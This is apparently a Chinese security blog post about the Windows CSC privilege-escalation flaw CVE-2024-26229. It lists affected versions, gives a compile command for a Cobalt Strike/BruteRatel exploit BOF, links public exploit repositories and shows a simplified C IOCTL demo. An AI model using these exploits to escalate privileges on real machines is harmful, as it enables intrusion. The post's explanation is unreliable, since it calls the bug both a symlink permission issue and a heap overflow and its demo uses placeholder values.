freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

Windows CSC 提权漏洞 CVE-2024-26229
kid_H4k 2024-06-23 23:37:24 125915

省流:这个提权漏洞需要目标主机启用CSC服务,2008/2012没有这服务(无法利用),2016/2019/2022有该服务,但是默认都禁用了。但是据有些师傅说win10复现成功了。


image-20240623210938946

漏洞阐述

CVE-2024-26229是一个影响Windows操作系统中的客户端缓存(CSC)服务的权限提升漏洞。CSC服务是负责管理离线文件或文件夹重定向的本地缓存的组件。这个漏洞允许潜在攻击者通过不当的文件操作和权限管理来访问敏感信息,修改或删除关键的系统文件,从而实现权限提升 (NVD)。

具体来说,这个漏洞涉及CSC服务在处理文件和文件夹的符号链接时的权限检查不足。攻击者可以通过创建恶意的符号链接,使得系统在处理这些链接时错误地授予文件访问权限。这可以允许攻击者执行代码或访问通常受保护的系统文件,从而获得更高的系统权限 (CVE CyberSecurity Database News)。

在技术分类上,此漏洞被标记为CWE-122,这代表它是一种基于堆的缓冲区溢出漏洞。在CVSS评分系统中,该漏洞的严重性评分为7.8,属于高危。


受影响版本详细列表

序号受影响的系统版本号
1WindowsServer 2022, 23H2 Edition (Server Core installation)10.0.25398.830
2WindowsServer 2012 R26.3.9600.21924
3Windows Server 2012 (Server Core installation)6.2.9200.24821
4WindowsServer 20126.2.9200.24821
5WindowsServer 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)6.1.7601.27067
6WindowsServer 2008 R2 for x64-based Systems Service Pack 16.1.7601.27067
7WindowsServer 2008 for x64-based Systems Service Pack 2 (Server Core installation)6.0.6003.22618
8WindowsServer 2008 for x64-based Systems Service Pack 26.0.6003.22618
9WindowsServer 2008 for 32-bit Systems Service Pack 2 (Server Core installation)6.0.6003.22618
10WindowsServer 2008 for 32-bit Systems Service Pack 26.0.6003.22618
11WindowsServer 2016 (Server Core installation)10.0.14393.6897
12WindowsServer 201610.0.14393.6897
13Windows 10 Version 1607 for x64-based Systems10.0.14393.6897
14Windows10 Version 1607 for 32-bit Systems10.0.14393.6897
15Windows10 for x64-based Systems10.0.10240.20596
16Windows 10 for 32-bit Systems10.0.10240.20596
17Windows11 Version 23H2 for x64-based Systems10.0.22631.3447
18Windows11 Version 23H2 for ARM64-based Systems10.0.22631.3447
19Windows10 Version 22H2 for 32-bit Systems10.0.19045.4291
20Windows10 Version 22H2 for ARM64-based Systems10.0.19045.4291
21Windows10 Version 22H2 for x64-based Systems10.0.19045.4291
22Windows11 Version 22H2 for x64-based Systems10.0.22621.3447
23Windows11 Version 22H2 for ARM64-based Systems10.0.22621.3447
24Windows10 Version 21H2 for x64-based Systems10.0.19044.4291
25Windows10 Version 21H2 for ARM64-based Systems10.0.19044.4291
26Windows10 Version 21H2 for 32-bit Systems10.0.19044.4291
27Windows11 version 21H2 for ARM64-based Systems10.0.22000.2899
28Windows11 version 21H2 for x64-based Systems10.0.22000.2899
29WindowsServer 2012 R2 (Server Core installation)6.3.9600.21924
30WindowsServer 2022 (Server Core installation)10.0.20348.2402
31WindowsServer 202210.0.20348.2402
32Windows Server 2019 (Server Core installation)10.0.17763.5696
33WindowsServer 201910.0.17763.5696
34Windows10 Version 1809 for ARM64-based Systems10.0.17763.5696
35Windows 10 Version 1809 for x64-based Systems10.0.17763.5696
36Windows10 Version 1809 for 32-bit Systems10.0.17763.5696

CVE-2024-26229 BOF

针对 Cobalt Strike 和 BruteRatel 的Beacon 对象文件 (BOF) 实现,由NVISO提供。

gcc -c CVE-2024-26229-bof.c -o CVE-2024-26229-bof.o

详细代码和编译方法可以在以下GitHub页面找到:NVISOsecurity/CVE-2024-26229-BOF

编译命令

gcc -c CVE-2024-26229-bof.c -o CVE-2024-26229-bof.o

image-20240623214301684

image-20240623214313513


CVE-2024-26229 poc exp

地址:https://github.com/varwara/CVE-2024-26229


image-20240623214141104


CVE-2024-26229 POC Exploit

此部分提供了漏洞的利用代码,适用于环境 Windows 11 22H2 Build 22621。这是一个基本的概念验证演示(POC)代码,该代码展示了如何通过符号链接(Symlink)的方式利用该漏洞。

代码演示

以下是一个简化的演示代码段,用于说明攻击的基本原理:

#include <Windows.h>
#include <stdio.h>

int main() {
HANDLE hDevice = CreateFile("\\\\.\\CSCService", GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hDevice == INVALID_HANDLE_VALUE) {
printf("Failed to open device\n");
return 1;
}

DWORD bytesReturned;
char payload[100] = {0};  // 模拟的有效负载,需根据实际情况调整
BOOL status = DeviceIoControl(hDevice, 0x222000, payload, sizeof(payload), NULL, 0, &bytesReturned, NULL);
if (!status) {
printf("Exploit failed\n");
return 1;
}

printf("Exploit sent\n");
CloseHandle(hDevice);
return 0;
}

该代码尝试通过特定的IOCTL请求发送数据到Windows CSC服务,从而触发漏洞。请注意,这只是一个概念验证的例子,并且在实际情况中,攻击的细节可能有所不同。

# 本地提权 # 提权工具 # 提权 # Windows提权 # 内网提权
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 kid_H4k 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
kid_H4k LV.5
我很菜
  • 26 文章数
  • 30 关注者
新钓鱼技术——页面双生
2025-02-10
某国产新势力车企 src 挖掘小记
2024-12-19
ParamGuard:一款针对Web安全的参数提取与检测工具
2024-08-16
文章目录